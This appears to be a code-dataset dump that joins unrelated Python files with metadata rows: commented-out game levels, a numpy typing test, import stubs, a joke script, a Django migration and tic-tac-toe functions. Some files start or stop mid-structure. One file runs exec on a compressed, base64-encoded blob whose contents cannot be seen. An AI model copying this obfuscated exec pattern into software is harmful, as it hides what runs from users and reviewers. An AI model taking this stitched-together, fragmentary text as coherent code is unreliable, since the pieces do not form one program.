##'npcs' : [((1, 4), 0, 5), ((2, 4), 90, 5), ((3, 4), 180, 5), ((4, 4), 180, 5), ((5, 4), 180, 5), ((1, 5), 90, 5), ((2, 5), 90, 5), ((3, 5), 180, 5), ((4, 5), 180, 5), ((5, 5), 180, 5), ((2, 6), 90, 5), ((3, 6), 90, 5), ((4, 6), 180, 5), ((5, 6), 180, 5)],
##'name' : None,
##'array' : [[0, 16, 17, 16, 0, 11, 11, 12, 11, 0], [16, 0, 0, 15, 16, 13, 19, 0, 21, 11], [16, 0, 0, 0, 18, 11, 19, 0, 0, 13], [0, 16, 10, 16, 16, 16, 11, 15, 0, 11], [5, 0, 0, 0, 0, 0, 16, 11, 0, 11], [5, 0, 0, 8, 0, 0, 9, 0, 0, 12], [5, 20, 0, 0, 0, 0, 16, 11, 0, 11], [0, 16, 16, 16, 16, 16, 11, 15, 0, 11], [0, 0, 0, 0, 0, 0, 11, 21, 0, 11], [0, 0, 0, 0, 0, 0, 0, 11, 14, 0]],
##'ground_color' : (255, 255, 255),
##'lvl_number' : None,
##'shade' : (False, (0,0,0,0), 0),
##'player_pos' : [1, 1],
##'sky_color' : (255, 255, 255),
##}))
##
##SETTINGS.levels_list.append(Level({
## 'lvl_number' : 2,
## 'sky_color': SETTINGS.LIGHTGRAY,
## 'ground_color': SETTINGS.LIGHTGRAY,
## 'npcs' : [([3,15], 90, 0), ([8,8], 0, 0), ([17,14], 270, 0), ([17, 11], 0, 1), ([5,11], 270, 3)],
## 'items' : [([5,15],2), ([6,5], 1), ([10, 1], 6),([9,1], 2), ([11,1], 2), ([1, 10], 2), ([2, 19], 2), ([10, 9], 0), ([15, 6], 1), ([15, 7], 3), ([7, 18], 0), ([7, 19], 2)],
## 'player_pos' : [6,2],
## 'array' : [
## #0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0
## [0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0],
## [0,0,0,0,0,0,1,0,1,0,8,0,1,0,0,0,0,0,0,0,0],
## [0,0,0,0,0,1,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0],
## [0,1,1,1,1,1,10,1,1,1,10,1,0,0,0,0,0,0,0,0,0],
## [1,0,0,0,0,0,0,0,0,0,0,7,1,0,1,1,0,0,0,0,0],
## [1,0,8,0,0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,0,0],
## [1,0,0,1,1,1,1,1,1,1,10,1,1,1,0,0,1,0,0,0,0],
## [1,0,0,1,0,0,1,0,0,0,0,0,0,9,0,0,1,0,0,0,0],
## [1,0,0,1,0,0,9,0,0,0,8,0,0,1,0,0,1,0,0,0,0],
## [1,0,0,1,0,0,1,7,0,0,0,0,0,1,1,1,0,0,4,0,0],
## [1,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,10,1,0],
## [1,0,8,0,0,0,0,0,0,8,0,0,0,0,1,1,0,0,0,0,1],
## [1,0,0,0,0,0,0,0,0,0,0,0,0,7,1,1,0,0,0,0,1],
## [0,1,1,10,1,1,1,1,1,1,1,1,10,1,1,0,1,1,10,1,0],
## [1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,1,0,0,0,0,1],
## [1,0,0,8,0,0,1,0,0,1,0,0,8,0,0,1,0,0,8,0,1],
## [0,1,10,1,1,1,1,1,1,1,1,1,0,1,1,1,0,0,0,0,1],
## [1,0,0,0,0,7,1,0,0,9,0,0,0,0,0,0,0,0,0,0,1],
## [1,0,0,8,0,0,1,0,0,1,1,1,1,1,1,1,1,1,1,1,0],
## [1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0],
## [0,1,1,1,1,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0],
## ]}))
##
##SETTINGS.levels_list.append(Level({
## 'lvl_number' : 3,
## 'sky_color' : SETTINGS.GRAY,
## 'ground_color' : SETTINGS.DARKRED,
## 'npcs' : [([5,18], 90, 4), ([4,2], 270, 0), ([5,7], 180, 3)],
## 'items' : [([10,3],1), ([8,2],4), ([5,10],7), ([1,9],3), ([1,10],3), ([1,11],3), ([10,9],2), ([10,10],2), ([10,11],2), ([5,14],0), ([2,10],0), ([9,10],1),([1,18],0),([9,18],0)],
## 'player_pos' : [1,2],
## 'array' : [
## #0 1 2 3 4 5 6 7 8 9 0 11
## [0,0,0,1,2,1,0,1,1,0,5,0],#0
## [0,1,1,0,0,0,1,0,0,1,0,5],#1
## [1,0,9,0,8,0,9,0,0,9,0,5],#2
## [0,1,1,0,0,0,1,0,0,1,0,5],#3
## [0,0,0,1,1,1,1,0,0,1,5,0],#4
## [0,0,0,1,7,0,0,0,0,1,0,0],#5
## [0,0,0,2,0,8,0,1,1,0,0,0],#6
## [0,0,0,1,0,0,0,1,0,0,0,0],#7
## [0,1,1,0,1,10,1,0,1,1,1,0],#8
## [1,0,0,1,0,0,0,1,0,0,0,1],#9
## [3,0,8,9,0,8,0,9,0,8,0,2],#10
## [1,0,0,1,0,0,0,1,0,0,0,1],#11
## [0,1,1,0,1,10,1,0,1,3,1,0],#12
## [0,0,0,1,0,0,0,1,0,0,0,0],#13
## [0,0,0,1,0,8,0,1,0,0,0,0],#14
## [0,0,0,1,1,10,1,1,0,0,0,0],#15
## [0,1,1,0,0,8,0,0,1,1,0,0],#16
## [1,0,1,0,6,0,6,0,1,0,1,0],#17
## [2,0,9,8,0,8,0,8,9,0,3,0],#18
## [1,0,1,0,6,0,6,0,1,0,1,0],#19
## [0,1,1,0,0,8,0,0,1,1,0,0],#20
## [0,0,0,1,1,10,1,1,0,0,0,0],#21
## [0,0,0,5,0,0,0,5,0,0,0,0],#22
## [0,0,0,5,0,8,0,5,0,0,0,0],#23
## [0,0,0,0,1,10,1,0,0,0,0,0],#24
## [0,0,0,0,1,0,1,0,0,0,0,0],#25
## [0,0,0,0,0,4,0,0,0,0,0,0],#26
## ]}))
##
##SETTINGS.levels_list.append(Level({
##'items' : [((1, 1), 2), ((2, 1), 6), ((3, 1), 2)],
##'npcs' : [((8, 8), 180, 0), ((3, 10), 90, 2), ((8, 10), 180, 0)],
##'player_pos' : [3, 2],
##'sky_color' : SETTINGS.LIGHTGRAY,
##'array' : [[1, 1, 1, 1, 1, 0, 0, 0, 0, 0], [1, 0, 0, 0, 2, 0, 0, 0, 0, 0], [1, 0, 0, 0, 1, 0, 0, 0, 0, 0], [1, 1, 10, 1, 1, 1, 1, 1, 1, 1], [1, 0, 0, 0, 0, 0, 0, 0, 7, 1], [1, 0, 0, 0, 0, 0, 0, 0, 0, 1], [1, 0, 8, 0, 0, 0, 0, 0, 0, 1], [3, 0, 0, 0, 1, 1, 1, 2, 1, 1], [1, 0, 0, 0, 1, 0, 0, 0, 0, 5], [1, 0, 0, 0, 9, 0, 0, 8, 0, 4], [1, 0, 0, 0, 1, 0, 0, 0, 0, 5], [1, 2, 1, 1, 1, 5, 5, 5, 5, 5]],
##'ground_color' : SETTINGS.DARKGRAY,
##'lvl_number' : 4,
##}))
#NPC spawn syntax: [([map pos], face, id)]
#Item spawn syntax: [([map pos], id)]
| 43.978495 | 398 | 0.401467 | 2,078 | 8,180 | 1.556785 | 0.037536 | 0.372798 | 0.38949 | 0.363524 | 0.639876 | 0.570325 | 0.517774 | 0.406801 | 0.360742 | 0.336012 | 0 | 0.323725 | 0.228117 | 8,180 | 185 | 399 | 44.216216 | 0.188628 | 0.854768 | 0 | 0 | 0 | 0 | 0.104287 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.055556 | 0 | 0.166667 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
320f05df5228a8802dcd117dea9b8c8185a7a943 | 2,615 | py | Python | numpy/typing/tests/data/fail/char.py | fishmandev/numpy | 7e8285ba48179b19b4d251ac3447569141c7e8f7 | [
"BSD-3-Clause"
] | 1 | 2021-09-25T14:21:36.000Z | 2021-09-25T14:21:36.000Z | numpy/typing/tests/data/fail/char.py | fishmandev/numpy | 7e8285ba48179b19b4d251ac3447569141c7e8f7 | [
"BSD-3-Clause"
] | 79 | 2021-06-23T21:05:30.000Z | 2022-03-28T08:11:46.000Z | numpy/typing/tests/data/fail/char.py | fishmandev/numpy | 7e8285ba48179b19b4d251ac3447569141c7e8f7 | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
import numpy.typing as npt
AR_U: npt.NDArray[np.str_]
AR_S: npt.NDArray[np.bytes_]
np.char.equal(AR_U, AR_S) # E: incompatible type
np.char.not_equal(AR_U, AR_S) # E: incompatible type
np.char.greater_equal(AR_U, AR_S) # E: incompatible type
np.char.less_equal(AR_U, AR_S) # E: incompatible type
np.char.greater(AR_U, AR_S) # E: incompatible type
np.char.less(AR_U, AR_S) # E: incompatible type
np.char.encode(AR_S) # E: incompatible type
np.char.decode(AR_U) # E: incompatible type
np.char.join(AR_U, b"_") # E: incompatible type
np.char.join(AR_S, "_") # E: incompatible type
np.char.ljust(AR_U, 5, fillchar=b"a") # E: incompatible type
np.char.ljust(AR_S, 5, fillchar="a") # E: incompatible type
np.char.rjust(AR_U, 5, fillchar=b"a") # E: incompatible type
np.char.rjust(AR_S, 5, fillchar="a") # E: incompatible type
np.char.lstrip(AR_U, chars=b"a") # E: incompatible type
np.char.lstrip(AR_S, chars="a") # E: incompatible type
np.char.strip(AR_U, chars=b"a") # E: incompatible type
np.char.strip(AR_S, chars="a") # E: incompatible type
np.char.rstrip(AR_U, chars=b"a") # E: incompatible type
np.char.rstrip(AR_S, chars="a") # E: incompatible type
np.char.partition(AR_U, b"a") # E: incompatible type
np.char.partition(AR_S, "a") # E: incompatible type
np.char.rpartition(AR_U, b"a") # E: incompatible type
np.char.rpartition(AR_S, "a") # E: incompatible type
np.char.replace(AR_U, b"_", b"-") # E: incompatible type
np.char.replace(AR_S, "_", "-") # E: incompatible type
np.char.split(AR_U, b"_") # E: incompatible type
np.char.split(AR_S, "_") # E: incompatible type
np.char.rsplit(AR_U, b"_") # E: incompatible type
np.char.rsplit(AR_S, "_") # E: incompatible type
np.char.count(AR_U, b"a", start=[1, 2, 3]) # E: incompatible type
np.char.count(AR_S, "a", end=9) # E: incompatible type
np.char.endswith(AR_U, b"a", start=[1, 2, 3]) # E: incompatible type
np.char.endswith(AR_S, "a", end=9) # E: incompatible type
np.char.startswith(AR_U, b"a", start=[1, 2, 3]) # E: incompatible type
np.char.startswith(AR_S, "a", end=9) # E: incompatible type
np.char.find(AR_U, b"a", start=[1, 2, 3]) # E: incompatible type
np.char.find(AR_S, "a", end=9) # E: incompatible type
np.char.rfind(AR_U, b"a", start=[1, 2, 3]) # E: incompatible type
np.char.rfind(AR_S, "a", end=9) # E: incompatible type
np.char.index(AR_U, b"a", start=[1, 2, 3]) # E: incompatible type
np.char.index(AR_S, "a", end=9) # E: incompatible type
np.char.rindex(AR_U, b"a", start=[1, 2, 3]) # E: incompatible type
np.char.rindex(AR_S, "a", end=9) # E: incompatible type
| 39.029851 | 71 | 0.679924 | 491 | 2,615 | 3.488798 | 0.10387 | 0.154116 | 0.436661 | 0.476941 | 0.941039 | 0.941039 | 0.940455 | 0.754816 | 0.613543 | 0.507881 | 0 | 0.014254 | 0.141491 | 2,615 | 66 | 72 | 39.621212 | 0.748775 | 0.352964 | 0 | 0 | 0 | 0 | 0.023072 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.041667 | 0 | 0.041667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5c7cdd5e2b3c5538b36921b0cbe218d534ee7326 | 948 | py | Python | src/cool/cmp/.ipynb_checkpoints/tools-checkpoint.py | Men-in-Code/cool-compiler-2021 | eb4dbb40f4d1e275176796cad2f1731d332ce7d2 | [
"MIT"
] | 1 | 2019-12-23T20:42:59.000Z | 2019-12-23T20:42:59.000Z | src/cool/cmp/.ipynb_checkpoints/tools-checkpoint.py | Men-in-Code/cool-compiler-2021 | eb4dbb40f4d1e275176796cad2f1731d332ce7d2 | [
"MIT"
] | null | null | null | src/cool/cmp/.ipynb_checkpoints/tools-checkpoint.py | Men-in-Code/cool-compiler-2021 | eb4dbb40f4d1e275176796cad2f1731d332ce7d2 | [
"MIT"
] | 1 | 2022-03-13T23:05:33.000Z | 2022-03-13T23:05:33.000Z | import zlib, base64
exec(zlib.decompress(base64.b64decode('eJyVUk1r3DAQvftXiJy81BXJtaBDD+lSqFvThmVBGCOvx46ovhjJ2WZL/3sly5vNllwKAs08zeg9vdEAI+lnqYbOCfTSTF0QvYJyW40SffDVaJWyR7/5UJCa/f5TkNEiEUQasqUN2mE+BGmNj8dkzwT9AmOIYRPD73J6THFqgNSQb+RNm4pJwOdlJzXfV9BS4RyYoRSbBMKvA7jw+pxx0cZUjpdr6MGaIKTxHTgvlTVL/YUuK+f7zHchfJPxivKKEyHMaEhdDNErDcEOtnMIg4wvf7KdsR3CYY7mPdloW52cWirLYwrJjvEtvf/2qdpSHwSGH8+6tyq9RWt2G7cT4yk7PkoF5AFnWDRMbEeddeUiTrAj1zpVJQMm+tk/AGpphMp6E8iYWMXnbCFdEdIjiJ85BuXhDGv9jt0V/6AOpQnlzT2iRUo+9hZD/BeU0pts1NmQr9ZAcdV6cbhhNZ8q0fLbNgNpKjJNBYWZoFRgyib/kM37u2pZm7Oq3XkyawWX7cp8ejl5Y2b/qXvNTi8D1sVffqzjDA==')))
# Created by pyminifier (https://github.com/liftoff/pyminifier)
deprecated_metodo_predictivo_no_recursivo = metodo_predictivo_no_recursivo
def metodo_predictivo_no_recursivo(G, M):
parser = deprecated_metodo_predictivo_no_recursivo(G, M)
def updated(tokens):
return parser([t.token_type for t in tokens])
return updated | 94.8 | 587 | 0.887131 | 74 | 948 | 11.162162 | 0.675676 | 0.077482 | 0.087167 | 0.130751 | 0.127119 | 0.070218 | 0 | 0 | 0 | 0 | 0 | 0.087875 | 0.051688 | 948 | 10 | 588 | 94.8 | 0.830923 | 0.064346 | 0 | 0 | 0 | 0.125 | 0.613995 | 0.613995 | 0 | 1 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.125 | 0.125 | 0.625 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
7a37574a6485db21b14a941e7975c15475406164 | 232 | py | Python | bip_utils/bip/bip44_base/__init__.py | MIPPLTeam/bip_utils | c66446e7ac3879d2cf6308c5b8eb7f7705292660 | [
"MIT"
] | 149 | 2020-05-15T08:11:43.000Z | 2022-03-29T16:34:42.000Z | bip_utils/bip/bip44_base/__init__.py | MIPPLTeam/bip_utils | c66446e7ac3879d2cf6308c5b8eb7f7705292660 | [
"MIT"
] | 41 | 2020-04-03T15:57:56.000Z | 2022-03-31T08:25:11.000Z | bip_utils/bip/bip44_base/__init__.py | MIPPLTeam/bip_utils | c66446e7ac3879d2cf6308c5b8eb7f7705292660 | [
"MIT"
] | 55 | 2020-04-03T17:05:15.000Z | 2022-03-24T12:43:42.000Z | from bip_utils.bip.bip44_base.bip44_base_ex import Bip44DepthError
from bip_utils.bip.bip44_base.bip44_base import Bip44Changes, Bip44Levels, Bip44Base
from bip_utils.bip.bip44_base.bip44_keys import Bip44PublicKey, Bip44PrivateKey
| 58 | 84 | 0.883621 | 34 | 232 | 5.735294 | 0.411765 | 0.230769 | 0.184615 | 0.230769 | 0.487179 | 0.487179 | 0.487179 | 0.338462 | 0 | 0 | 0 | 0.110599 | 0.064655 | 232 | 3 | 85 | 77.333333 | 0.788018 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
7a4f0470eebf524ece55691154aa684ccd3a105b | 2,016 | py | Python | source.py | yashcubex/pymyjoke | 1ed8f1e7f5b4d63bdc7eb03e28c661da11653497 | [
"MIT"
] | null | null | null | source.py | yashcubex/pymyjoke | 1ed8f1e7f5b4d63bdc7eb03e28c661da11653497 | [
"MIT"
] | null | null | null | source.py | yashcubex/pymyjoke | 1ed8f1e7f5b4d63bdc7eb03e28c661da11653497 | [
"MIT"
] | null | null | null | import random
#Whole joke library
joke_lib = ["My wife told me to stop impersonating a flamingo. I had to put my foot down. ", "I went to buy some camo pants but couldn’t find any.", "I failed math so many times at school, I can’t even count.", "I used to have a handle on life, but then it broke.", "I was wondering why the frisbee kept getting bigger and bigger, but then it hit me.", "I heard there were a bunch of break-ins over at the car park. That is wrong on so many levels.", "I want to die peacefully in my sleep, like my grandfather… Not screaming and yelling like the passengers in his car.", "When life gives you melons, you might be dyslexic.", "Don’t you hate it when someone answers their own questions? I do.", "It takes a lot of balls to golf the way I do.", "I told him to be himself; that was pretty mean, I guess. ", "I know they say that money talks, but all mine says is ‘Goodbye.’", "My father has schizophrenia, but he’s good people.", "The problem with kleptomaniacs is that they always take things literally.", "I can’t believe I got fired from the calendar factory. All I did was take a day off.", "Most people are shocked when they find out how bad I am as an electrician.", "Never trust atoms; they make up everything.", "My wife just found out I replaced our bed with a trampoline. She hit the ceiling! ", "I was addicted to the hokey pokey, but then I turned myself around.", "I used to think I was indecisive. But now I’m not so sure.", "Light travels faster than sound, which is the reason that some people appear bright before you hear them speak. ", "Two fish are in a tank. One says, ‘How do you drive this thing?’", "I always take life with a grain of salt. And a slice of lemon. And a shot of tequila.", "Just burned 2,000 calories. That’s the last time I leave brownies in the oven while I nap.", "Always borrow money from a pessimist. They’ll never expect it back."]
#maincode
class pymyjoke():
def joke():
return random.choice(joke_lib)
print(pymyjoke.joke())
| 118.588235 | 1,873 | 0.733631 | 378 | 2,016 | 3.915344 | 0.597884 | 0.014189 | 0.006757 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002445 | 0.188492 | 2,016 | 16 | 1,874 | 126 | 0.900367 | 0.012897 | 0 | 0 | 0 | 1 | 0.886318 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0.166667 | 0.166667 | 0.166667 | 0.666667 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 7 |
7a61f809ea120b0a5a5861c2bad210b992e974bb | 123 | py | Python | pypif/obj/system/chemical/alloy/__init__.py | ventura-rivera/pypif | 42b40b0a4f80ccf909c9ff8dcc337f726b21be60 | [
"Apache-2.0"
] | 9 | 2016-09-07T19:36:47.000Z | 2022-01-03T13:17:25.000Z | pypif/obj/system/chemical/alloy/__init__.py | ventura-rivera/pypif | 42b40b0a4f80ccf909c9ff8dcc337f726b21be60 | [
"Apache-2.0"
] | 20 | 2016-08-22T20:24:28.000Z | 2017-11-28T22:18:47.000Z | pypif/obj/system/chemical/alloy/__init__.py | ventura-rivera/pypif | 42b40b0a4f80ccf909c9ff8dcc337f726b21be60 | [
"Apache-2.0"
] | 13 | 2016-01-08T21:09:48.000Z | 2020-04-30T22:13:28.000Z | from pypif.obj.system.chemical.alloy.alloy import Alloy
from pypif.obj.system.chemical.alloy.alloy_phase import AlloyPhase
| 41 | 66 | 0.853659 | 19 | 123 | 5.473684 | 0.473684 | 0.173077 | 0.230769 | 0.346154 | 0.692308 | 0.692308 | 0.692308 | 0 | 0 | 0 | 0 | 0 | 0.065041 | 123 | 2 | 67 | 61.5 | 0.904348 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
7a6884eb6282a4af6a4c727184ad962f4fc151cd | 4,669 | py | Python | safe_transaction_service/history/migrations/0048_block_number_token_transfers_20211126_1443.py | byteflyfunny/safe-transaction-service | 2a1a855d9881181a57692057aeb91c9fd8ae3de5 | [
"MIT"
] | 5 | 2018-07-02T17:18:18.000Z | 2018-09-10T20:58:34.000Z | safe_transaction_service/history/migrations/0048_block_number_token_transfers_20211126_1443.py | byteflyfunny/safe-transaction-service | 2a1a855d9881181a57692057aeb91c9fd8ae3de5 | [
"MIT"
] | 5 | 2018-08-08T11:05:56.000Z | 2018-10-03T08:51:37.000Z | safe_transaction_service/history/migrations/0048_block_number_token_transfers_20211126_1443.py | byteflyfunny/safe-transaction-service | 2a1a855d9881181a57692057aeb91c9fd8ae3de5 | [
"MIT"
] | 1 | 2022-02-07T09:04:23.000Z | 2022-02-07T09:04:23.000Z | # Generated by Django 3.2.8 on 2021-11-26 15:57
import django.utils.timezone
from django.db import migrations, models
import gnosis.eth.django.models
class Migration(migrations.Migration):
dependencies = [
("history", "0047_auto_20211102_1659"),
]
operations = [
migrations.AddField(
model_name="erc20transfer",
name="block_number",
field=models.PositiveIntegerField(default=0),
preserve_default=False,
),
migrations.AddField(
model_name="erc20transfer",
name="timestamp",
field=models.DateTimeField(
db_index=True, default=django.utils.timezone.now
),
preserve_default=False,
),
migrations.AddField(
model_name="erc721transfer",
name="block_number",
field=models.PositiveIntegerField(default=0),
preserve_default=False,
),
migrations.AddField(
model_name="erc721transfer",
name="timestamp",
field=models.DateTimeField(
db_index=True, default=django.utils.timezone.now
),
preserve_default=False,
),
migrations.AlterField(
model_name="erc20transfer",
name="_from",
field=gnosis.eth.django.models.EthereumAddressField(),
),
migrations.AlterField(
model_name="erc20transfer",
name="to",
field=gnosis.eth.django.models.EthereumAddressField(),
),
migrations.AlterField(
model_name="erc721transfer",
name="_from",
field=gnosis.eth.django.models.EthereumAddressField(),
),
migrations.AlterField(
model_name="erc721transfer",
name="to",
field=gnosis.eth.django.models.EthereumAddressField(),
),
migrations.AddIndex(
model_name="erc20transfer",
index=models.Index(
fields=["_from", "timestamp"], name="history_erc__from_64986c_idx"
),
),
migrations.AddIndex(
model_name="erc20transfer",
index=models.Index(
fields=["to", "timestamp"], name="history_erc_to_f32154_idx"
),
),
migrations.AddIndex(
model_name="erc721transfer",
index=models.Index(
fields=["_from", "timestamp"], name="history_erc__from_72fb41_idx"
),
),
migrations.AddIndex(
model_name="erc721transfer",
index=models.Index(
fields=["to", "timestamp"], name="history_erc_to_02d4ab_idx"
),
),
migrations.AlterField(
model_name="erc20transfer",
name="address",
field=gnosis.eth.django.models.EthereumAddressField(),
),
migrations.AlterField(
model_name="erc721transfer",
name="address",
field=gnosis.eth.django.models.EthereumAddressField(),
),
migrations.AddIndex(
model_name="erc20transfer",
index=models.Index(
fields=["address"], name="history_erc_address_dba64d_idx"
),
),
migrations.AddIndex(
model_name="erc721transfer",
index=models.Index(
fields=["address"], name="history_erc_address_94cee3_idx"
),
),
migrations.RunSQL(
"""
UPDATE "history_erc20transfer" SET (block_number, timestamp) =
(
SELECT "history_ethereumblock"."number", "history_ethereumblock"."timestamp"
FROM "history_ethereumtx" INNER JOIN "history_ethereumblock" ON (
"history_ethereumtx"."block_id" = "history_ethereumblock"."number"
) WHERE "history_erc20transfer"."ethereum_tx_id" = "history_ethereumtx"."tx_hash");
""",
reverse_sql=migrations.RunSQL.noop,
),
migrations.RunSQL(
"""
UPDATE "history_erc721transfer" SET (block_number, timestamp) =
(
SELECT "history_ethereumblock"."number", "history_ethereumblock"."timestamp"
FROM "history_ethereumtx" INNER JOIN "history_ethereumblock" ON (
"history_ethereumtx"."block_id" = "history_ethereumblock"."number"
) WHERE "history_erc721transfer"."ethereum_tx_id" = "history_ethereumtx"."tx_hash");
""",
reverse_sql=migrations.RunSQL.noop,
),
]
| 35.105263 | 100 | 0.559649 | 382 | 4,669 | 6.612565 | 0.204188 | 0.057007 | 0.069675 | 0.058195 | 0.859066 | 0.857878 | 0.802454 | 0.802454 | 0.802454 | 0.736342 | 0 | 0.033611 | 0.330906 | 4,669 | 132 | 101 | 35.371212 | 0.774968 | 0.009638 | 0 | 0.846847 | 1 | 0 | 0.14837 | 0.051359 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.027027 | 0 | 0.054054 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7a9a0c6e99152a13a58115a37496f0254407df93 | 37 | py | Python | preimutils/segmentations/__init__.py | ArianAmani/preimutils | d4f79525caae322d94d97febc4654229a2eb7407 | [
"MIT"
] | 6 | 2020-02-17T18:54:48.000Z | 2022-01-30T09:05:28.000Z | preimutils/segmentations/__init__.py | ArianAmani/preimutils | d4f79525caae322d94d97febc4654229a2eb7407 | [
"MIT"
] | null | null | null | preimutils/segmentations/__init__.py | ArianAmani/preimutils | d4f79525caae322d94d97febc4654229a2eb7407 | [
"MIT"
] | 3 | 2022-01-09T16:58:34.000Z | 2022-03-10T07:10:51.000Z | from . import voc
from . import coco
| 12.333333 | 18 | 0.72973 | 6 | 37 | 4.5 | 0.666667 | 0.740741 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.216216 | 37 | 2 | 19 | 18.5 | 0.931034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8fa49d40b6a03cba596ed4e53a73fb1c72deea12 | 7,174 | py | Python | neural_net/old_cell_nodes_leftovers.py | Ipgnosis/tic_tac_toe | e1519b702531965cc647ff37c1c46d72f4b3b24e | [
"BSD-3-Clause"
] | null | null | null | neural_net/old_cell_nodes_leftovers.py | Ipgnosis/tic_tac_toe | e1519b702531965cc647ff37c1c46d72f4b3b24e | [
"BSD-3-Clause"
] | 4 | 2021-03-25T19:52:40.000Z | 2021-12-12T17:57:11.000Z | neural_net/old_cell_nodes_leftovers.py | Ipgnosis/tic_tac_toe | e1519b702531965cc647ff37c1c46d72f4b3b24e | [
"BSD-3-Clause"
] | null | null | null |
"""
# test calls
zero = board_cell(0, 'zero')
print(zero.position)
print(zero.node_name)
zero.move = 'X'
print(zero.p_x_wins())
print(zero.p_o_wins())
print(zero.p_draw())
print(zero.cell_contains())
"""
# returns:
# 0 * weight for empty
# 1 * weight for 'X' (cross)
# -1 * weight for 'O' (nought)
#cell_weights = [1, 1, 1, 1, 1, 1, 1, 1, 1]
# cell node for cell zero
def zero(this_board):
this_cell = 0
index = 0 # starting default value
node_name = "zero"
cell_weight = cell_weights[this_cell]
if this_cell in this_board:
index = this_board.index(this_cell)
if index % 2 == 0 or index == 0:
if print_cell_results:
# cell contains "X"
print("Cell", node_name, ":", 1 * cell_weight)
return 1 * cell_weight
else:
# cell contains "O"
if print_cell_results:
print("Cell", node_name, ":", -1 * cell_weight)
return -1 * cell_weight
else:
# cell is empty
if print_cell_results:
print("Cell", node_name, ":", 0 * cell_weight)
return 0 * cell_weight
# cell node for cell 1
def one(this_board):
this_cell = 1
node_name = "one"
cell_weight = cell_weights[this_cell]
if this_cell in this_board:
index = this_board.index(this_cell)
if index % 2 == 0 or index == 0:
if print_cell_results:
# cell contains "X"
print("Cell", node_name, ":", 1 * cell_weight)
return 1 * cell_weight
else:
# cell contains "O"
if print_cell_results:
print("Cell", node_name, ":", -1 * cell_weight)
return -1 * cell_weight
else:
# cell is empty
if print_cell_results:
print("Cell", node_name, ":", 0 * cell_weight)
return 0 * cell_weight
# cell node for cell 2
def two(this_board):
this_cell = 2
node_name = "two"
cell_weight = cell_weights[this_cell]
if this_cell in this_board:
index = this_board.index(this_cell)
if index % 2 == 0 or index == 0:
if print_cell_results:
# cell contains "X"
print("Cell", node_name, ":", 1 * cell_weight)
return 1 * cell_weight
else:
# cell contains "O"
if print_cell_results:
print("Cell", node_name, ":", -1 * cell_weight)
return -1 * cell_weight
else:
# cell is empty
if print_cell_results:
print("Cell", node_name, ":", 0 * cell_weight)
